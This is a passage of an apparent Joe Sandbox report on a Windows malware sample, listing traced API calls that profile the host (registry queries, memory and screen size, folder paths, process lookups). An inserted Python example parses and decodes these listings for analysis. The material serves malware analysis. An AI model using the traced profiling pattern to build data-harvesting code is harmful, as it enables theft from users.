                                  • Opcode ID: b529b30e42c140b203222eee39e4cf72b471e2fd1d4bc2162e60aac40cfc1293
                                  • Instruction ID: 95a0f3ff52a9551f3a9f9673bd86c1a6ba913cd4b989f04027cec0899d61c51f
                                  • Opcode Fuzzy Hash: b529b30e42c140b203222eee39e4cf72b471e2fd1d4bc2162e60aac40cfc1293
                                  • Instruction Fuzzy Hash: 4F0128B1E04204AFDB05DF98DC49FAEB7BCFB44710F004129F90AE7380DB7459008AA5
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,00FAD530,00000000,00020119,?), ref: 0035D7F5
                                  • RegQueryValueExA.ADVAPI32(?,00FADCD0,00000000,00000000,00000000,000000FF), ref: 0035D819
                                  • RegCloseKey.ADVAPI32(?), ref: 0035D823
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035D848
                                  • lstrcat.KERNEL32(?,00FADEE0), ref: 0035D85C
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: e74f203b7e7fa242da875e8c61a2f7455d2a0fb087b7d307b1181f1525b257b8
                                  • Instruction ID: f7097cd269a007d80a6dfa46ce355bbaa1a05d7b9099192d7ae6e21c25be3b6f
                                  • Opcode Fuzzy Hash: e74f203b7e7fa242da875e8c61a2f7455d2a0fb087b7d307b1181f1525b257b8
                                  • Instruction Fuzzy Hash: 47415271A1010C9FCB55EF64EC86FEE77B8AB54304F404064B90D9B251EF30AAC99F91
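The two function blocks above (GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx and wsprintfA with the "%d MB" string, and the RegOpenKeyExA / RegQueryValueExA / RegCloseKey / lstrcat sequence) are shown by Joe Sandbox with their arguments as raw hex, so a reader has to decode by hand that 80000001 is HKEY_CURRENT_USER and that the samDesired 00020119 is KEY_READ plus KEY_WOW64_64KEY. The Python below is an added example, not part of this report or of Joe Sandbox's tooling: it parses bullet lines of this "APIs" listing format into records, decodes the registry arguments against the winreg.h constants, and labels the host-profiling idioms visible in these blocks. The sample input is the text of the two blocks above; the labels returned by classify() are this example's own wording, not Joe Sandbox signature names.

```python
"""
Added helper (not part of the Joe Sandbox report): parse "APIs" call listings
of the form shown above into structured records, decode the registry arguments
the report prints only as raw hex, and flag the host-profiling patterns that
appear in this sample's function blocks.
"""
import re
from dataclasses import dataclass
from typing import Optional

# One bullet line of an "APIs" listing, e.g.
#   • RegOpenKeyExA.ADVAPI32(80000001,00FAD530,00000000,00020119,?), ref: 0035D7F5
#   • GlobalMemoryStatusEx.KERNEL32 ref: 00363411
# Indented "Part of subcall function ...:" lines are skipped on purpose: those
# calls belong to a callee, not to the function whose block is being read.
CALL_RE = re.compile(
    r"^\s*•\s*(?P<name>[\w:]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class Call:
    name: str
    module: str
    args: list[Optional[int]]   # hex literal -> int, "?" (unknown to the tracer) -> None
    ref: int                    # call-site address inside the dumped image


def parse_block(listing: str) -> list[Call]:
    """Parse the bullet lines of one function's 'APIs' block; other lines pass through."""
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args: list[Optional[int]] = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        calls.append(Call(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def split_blocks(report: str) -> list[list[Call]]:
    """Split a report excerpt on its 'APIs' headings, one call list per function."""
    chunks = re.split(r"^\s*APIs\s*$", report, flags=re.MULTILINE)
    return [b for b in (parse_block(c) for c in chunks) if b]


# Predefined HKEY roots and registry access-mask bits (winreg.h / winnt.h)
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
KEY_RIGHTS = {
    0x00001: "KEY_QUERY_VALUE",
    0x00002: "KEY_SET_VALUE",
    0x00004: "KEY_CREATE_SUB_KEY",
    0x00008: "KEY_ENUMERATE_SUB_KEYS",
    0x00010: "KEY_NOTIFY",
    0x00020: "KEY_CREATE_LINK",
    0x00100: "KEY_WOW64_64KEY",
    0x00200: "KEY_WOW64_32KEY",
    0x20000: "READ_CONTROL",   # KEY_READ = READ_CONTROL|QUERY_VALUE|ENUMERATE_SUB_KEYS|NOTIFY
}


def decode_reg_open(call: Call) -> dict:
    """Name the hKey root and the samDesired bits of a RegOpenKeyExA/W call."""
    if not call.name.startswith("RegOpenKeyEx") or len(call.args) < 4:
        raise ValueError(f"not a RegOpenKeyEx call: {call.name}")
    root, access = call.args[0], call.args[3]
    rights = [name for bit, name in sorted(KEY_RIGHTS.items())
              if access is not None and access & bit]
    root_name = HKEY_ROOTS.get(root, hex(root) if root is not None else "?")
    return {"root": root_name, "access": rights, "call_site": call.ref}


def classify(calls: list[Call]) -> list[str]:
    """Label the profiling idioms seen in this sample (labels are this example's own)."""
    names = [c.name for c in calls]
    findings = []
    if "GlobalMemoryStatusEx" in names and any(n.startswith("wsprintf") for n in names):
        findings.append("fingerprint: physical memory size formatted as text")
    if any(n.startswith("RegQueryValueEx") for n in names):
        for c in calls:
            if c.name.startswith("RegOpenKeyEx"):
                d = decode_reg_open(c)
                findings.append(f"registry read: {d['root']} [{'|'.join(d['access'])}]")
    if names.count("StrCmpCA") >= 2:
        findings.append("string matching: repeated StrCmpCA against a fixed string")
    return findings


# Sample input: the two function blocks from the report text above this example.
SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 003633EF
• RtlAllocateHeap.NTDLL(00000000), ref: 003633F6
• GlobalMemoryStatusEx.KERNEL32 ref: 00363411
• wsprintfA.USER32 ref: 00363437
APIs
• RegOpenKeyExA.ADVAPI32(80000001,00FAD530,00000000,00020119,?), ref: 0035D7F5
• RegQueryValueExA.ADVAPI32(?,00FADCD0,00000000,00000000,00000000,000000FF), ref: 0035D819
• RegCloseKey.ADVAPI32(?), ref: 0035D823
• lstrcat.KERNEL32(?,00000000), ref: 0035D848
• lstrcat.KERNEL32(?,00FADEE0), ref: 0035D85C
"""

if __name__ == "__main__":
    for block in split_blocks(SAMPLE):
        print([c.name for c in block], classify(block))
```

Pasting a longer excerpt of the report into split_blocks() works as-is: only bullet lines that end in a `ref:` address are parsed, so the Memory Dump Source and Similarity lines are ignored, and the "Part of subcall function" lines are left out so that a callee's exception helpers are not attributed to the caller.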
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00357F31
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00357F60
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 00357FA5
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 00357FD3
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 00358007
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: f34a1e4f70d3546b629cf30d79ab895194f72f9085d4368a5307e4071d86da96
                                  • Instruction ID: 72450ba5262f05336d667fcd3d1b17e90ca677cbcc483595f48acd78c4804065
                                  • Opcode Fuzzy Hash: f34a1e4f70d3546b629cf30d79ab895194f72f9085d4368a5307e4071d86da96
                                  • Instruction Fuzzy Hash: 47418330504116DFCB22DF68E884EAE77F8FF55301B114199E809DB361DB71AA69CB91
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003580BB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003580EA
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 00358102
                                  • lstrlen.KERNEL32(00000000), ref: 00358140
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035816F
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: dfcdf667650759bb1affea53030d44551a6c6606250fd77489ebb14add965d76
                                  • Instruction ID: f6e5433d9d22106f9609cbd909d5a0795a076f73b13f4d5a0f2dc39630e6edb8
                                  • Opcode Fuzzy Hash: dfcdf667650759bb1affea53030d44551a6c6606250fd77489ebb14add965d76
                                  • Instruction Fuzzy Hash: 64416175600506ABCB22DF78D944FABBBF4AF44711F11805CAC49E7254EF34EA59CB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00363166
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0036316D
                                  • RegOpenKeyExA.ADVAPI32(80000002,00F9BC38,00000000,00020119,?), ref: 0036318C
                                  • RegQueryValueExA.ADVAPI32(?,00FAD3B0,00000000,00000000,00000000,000000FF), ref: 003631A7
                                  • RegCloseKey.ADVAPI32(?), ref: 003631B1
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 67aeab9576de84dd42f75c5724e2e4cf1c290e2c3ab045c8c4890d8ed3265e50
                                  • Instruction ID: ffdc747e248f85a2cf4fc421b917ce8b1211a145cb5f448911ed793d7b6ca273
                                  • Opcode Fuzzy Hash: 67aeab9576de84dd42f75c5724e2e4cf1c290e2c3ab045c8c4890d8ed3265e50
                                  • Instruction Fuzzy Hash: 15118276A40215AFD710CF94EC49FBBB7BCE748720F004119FA09E3280DB7459049BA1
                                  APIs
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 0087c19cbd087ed45626298f333d41610d2d9ca3e68bda9f3a8fdc5460afe8e1
                                  • Instruction ID: 0c2f9bd1f1b3244355e129b0c6abef8b8df57ee550ace1fc9a25c865ed64a630
                                  • Opcode Fuzzy Hash: 0087c19cbd087ed45626298f333d41610d2d9ca3e68bda9f3a8fdc5460afe8e1
                                  • Instruction Fuzzy Hash: A841097050475CAEDB338B24CC95FFB7BFC9B46704F1488E9E98A8618AD2719A45CF60
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00348996
                                    • Part of subcall function 0036A1C0: std::exception::exception.LIBCMT ref: 0036A1D5
                                    • Part of subcall function 0036A1C0: std::exception::exception.LIBCMT ref: 0036A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003489CD
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A188
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2002836212-4289949731
                                  • Opcode ID: b555d59943a0f9ce47cfe4db8ed38d9d04cd5f2b13d9bd3138549a7841f543c2
                                  • Instruction ID: 3d00db3a0a9070fb41ba2e572a2083f3185d3ba9b6f851f3f555b5d5f5e0eb81
                                  • Opcode Fuzzy Hash: b555d59943a0f9ce47cfe4db8ed38d9d04cd5f2b13d9bd3138549a7841f543c2
                                  • Instruction Fuzzy Hash: 2C219172300A509BC7229B5CE840A6EF7E9DBA1765B15092BF152CF681CBB1EC41C7A6
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00348883
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A188
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 6ad8d2ae7ee6efa670458fd6f905fed5175381a093dd5fbc7d0a6aee936d8c65
                                  • Instruction ID: b473779a657ffaad3a6347ef9e428e0b5f28565a8a76beb945168ce6bfd9ccb0
                                  • Opcode Fuzzy Hash: 6ad8d2ae7ee6efa670458fd6f905fed5175381a093dd5fbc7d0a6aee936d8c65
                                  • Instruction Fuzzy Hash: 923195B5E005199FCB09DF58C8916AEBBB6EB88350F14C269E915AF385DB30AD01CBD1
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00365922
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A188
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A1AE
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00365935
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception
                                  • String ID: Sec-WebSocket-Version: 13$string too long
                                  • API String ID: 1928653953-3304177573
                                  • Opcode ID: 70aec00c29200863f005d7c94a1f8c391e1d017fb82cfbc725f02537cb519969
                                  • Instruction ID: aa62ef9cb2f6df73f130f7f87a8999ebd79a0c06a2a77b840cc6ef3a8247b649
                                  • Opcode Fuzzy Hash: 70aec00c29200863f005d7c94a1f8c391e1d017fb82cfbc725f02537cb519969
                                  • Instruction Fuzzy Hash: CB115231318B40CBC7338F2CE840719B7E5ABD2761F258A6DE0D18B699D761E841C7A5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0036A430,000000FF), ref: 00363D20
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00363D27
                                  • wsprintfA.USER32 ref: 00363D37
                                    • Part of subcall function 003671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003671FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 7f4d8e61b3b9a3864257064237b5d579bee649f8f82049312044bc6f1c0d353a
                                  • Instruction ID: 27e133219fd5420690e148788c422d784b338eae78d5e0bdc8c267e31d6478de
                                  • Opcode Fuzzy Hash: 7f4d8e61b3b9a3864257064237b5d579bee649f8f82049312044bc6f1c0d353a
                                  • Instruction Fuzzy Hash: C201D271A90710BFE7205B55EC0EFAABB7CFB55B61F004115FA09972D0DBB41904EAB2
                                  APIs
                                  • __getptd.LIBCMT ref: 00369279
                                    • Part of subcall function 003687FF: __amsg_exit.LIBCMT ref: 0036880F
                                  • __amsg_exit.LIBCMT ref: 00369299
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit$__getptd
                                  • String ID: Xu7$Xu7
                                  • API String ID: 441000147-1655893911
                                  • Opcode ID: 4fe479e2b0c3ca013fc6c04d701918457343f48fa360eebb1a535657e53edc8e
                                  • Instruction ID: 59f5d146af4cca88351f35446771feb5698a0d14b3aadf771aa82eaeffe5da8c
                                  • Opcode Fuzzy Hash: 4fe479e2b0c3ca013fc6c04d701918457343f48fa360eebb1a535657e53edc8e
                                  • Instruction Fuzzy Hash: EE01F932D06715A7D723AB29840679EB35CBF01714F56C416E8086B69CCB746C80DBD5
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00348737
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A188
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 913ff11d56595afb88fcc6e67ebbde62f3f3d37d2f1310ab954ef9df30f4d0fb
                                  • Instruction ID: 219f9f086a8e57b0a82b510983403a8be9c5d1c72f9de1a6aa8d4d934bd0e84e
                                  • Opcode Fuzzy Hash: 913ff11d56595afb88fcc6e67ebbde62f3f3d37d2f1310ab954ef9df30f4d0fb
                                  • Instruction Fuzzy Hash: DAF0B437F000210F83566A3D8D8449EBD8756E53A033AD725E91AEF369DC70FC8295D4
                                  APIs
                                    • Part of subcall function 0036781C: __mtinitlocknum.LIBCMT ref: 00367832
                                    • Part of subcall function 0036781C: __amsg_exit.LIBCMT ref: 0036783E
                                  • ___addlocaleref.LIBCMT ref: 00368756
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID: KERNEL32.DLL$Xu7$xt7
                                  • API String ID: 3105635775-368805316
                                  • Opcode ID: 769e9e588a3647d088a092efff7968f98a41ea303fe3c91052f52ff787806efc
                                  • Instruction ID: 2b98c84c4d91aeceef46f603c3d63d492db1ea60d976f6750495830c6319b8f0
                                  • Opcode Fuzzy Hash: 769e9e588a3647d088a092efff7968f98a41ea303fe3c91052f52ff787806efc
                                  • Instruction Fuzzy Hash: 9A019671445700DAE722AF79C80674AFBE0AF51328F20CA1DE4DA5B2E5CFB4AA44CB55
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035E544
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E573
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E581
                                  • lstrcat.KERNEL32(?,00FAD4D0), ref: 0035E59C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 78f379d80566a09f300632d035a7a246aef208de458dc593f7d0ebf96b7346f8
                                  • Instruction ID: b10739b1a0b800f39f3a9cf2857500600c6c6728f1225dc225709fbec0bff071
                                  • Opcode Fuzzy Hash: 78f379d80566a09f300632d035a7a246aef208de458dc593f7d0ebf96b7346f8
                                  • Instruction Fuzzy Hash: 3251B375A50108ABC756EB54EC46EFE37B8EB58300F444499F9099F251EE30AF889BA1
                                  APIs
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00361FDF, 00361FF5, 003620B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen
                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 39653677-4138519520
                                  • Opcode ID: 44228a9aabf3316c26f0685182be648e85af48144ede836de69516fa08834428
                                  • Instruction ID: f05733f76d369329389d8b370754a56879602374db4b05d018e58590b193e3e8
                                  • Opcode Fuzzy Hash: 44228a9aabf3316c26f0685182be648e85af48144ede836de69516fa08834428
                                  • Instruction Fuzzy Hash: 21217C395106898FCB22EB35C4447DEF76BDF80361F87C056C8180B24AE376190AD796
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035EBB4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035EBE3
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035EBF1
                                  • lstrcat.KERNEL32(?,00FADD18), ref: 0035EC0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: d5e4244878fcfebcf55f6ba055faaa072b6dff3ded8ab928c622839778790ce4
                                  • Instruction ID: 049269a07b3aefbb4103804c147da8961898c9ff2fa5c66a514c81e9c146e62f
                                  • Opcode Fuzzy Hash: d5e4244878fcfebcf55f6ba055faaa072b6dff3ded8ab928c622839778790ce4
                                  • Instruction Fuzzy Hash: D23188719101199BCB16EF64EC45FEE77F4AF58301F5044A4BA0AAF350DE30AF949BA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0036A3D0,000000FF), ref: 00362B8F
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00362B96
                                  • GetLocalTime.KERNEL32(?,?,00000000,0036A3D0,000000FF), ref: 00362BA2
                                  • wsprintfA.USER32 ref: 00362BCE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 2cf2b747aac300d4a01b8a5b6741c58aafb5e2b4af82213e53d0f2b8b0e606ba
                                  • Instruction ID: f168cd330fd237377081b4d8adc8750ccee6b9dca83c56792ff3de8368a43d69
                                  • Opcode Fuzzy Hash: 2cf2b747aac300d4a01b8a5b6741c58aafb5e2b4af82213e53d0f2b8b0e606ba
                                  • Instruction Fuzzy Hash: 450152B2954528ABCB149BC9ED49FBFB7BCFB4CB11F00011AFA05A2280E7785544E7B1
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000), ref: 00364492
                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 003644AD
                                  • CloseHandle.KERNEL32(00000000), ref: 003644B4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003644E7
                                  Memory Dump Source
